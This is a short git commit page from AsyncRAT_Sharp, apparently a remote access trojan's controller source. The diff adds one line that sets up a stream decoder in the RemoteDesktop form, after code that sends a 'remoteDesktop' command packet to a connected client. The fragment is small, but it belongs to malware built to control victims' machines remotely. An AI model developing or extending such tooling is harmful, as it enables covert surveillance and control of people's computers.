Update RemoteDesktop.cs

This commit is contained in:
NYAN CAT 2019-02-09 00:01:17 -08:00
parent 56501ac691
commit 8352f23389

View File

@ -47,6 +47,7 @@ namespace AsyncRAT_Sharp.Forms
msgpack.ForcePathObject("Packet").AsString = "remoteDesktop"; msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
msgpack.ForcePathObject("Option").AsString = "true"; msgpack.ForcePathObject("Option").AsString = "true";
C.BeginSend(msgpack.Encode2Bytes()); C.BeginSend(msgpack.Encode2Bytes());
decoder = new UnsafeStreamCodec(80);
} }
} }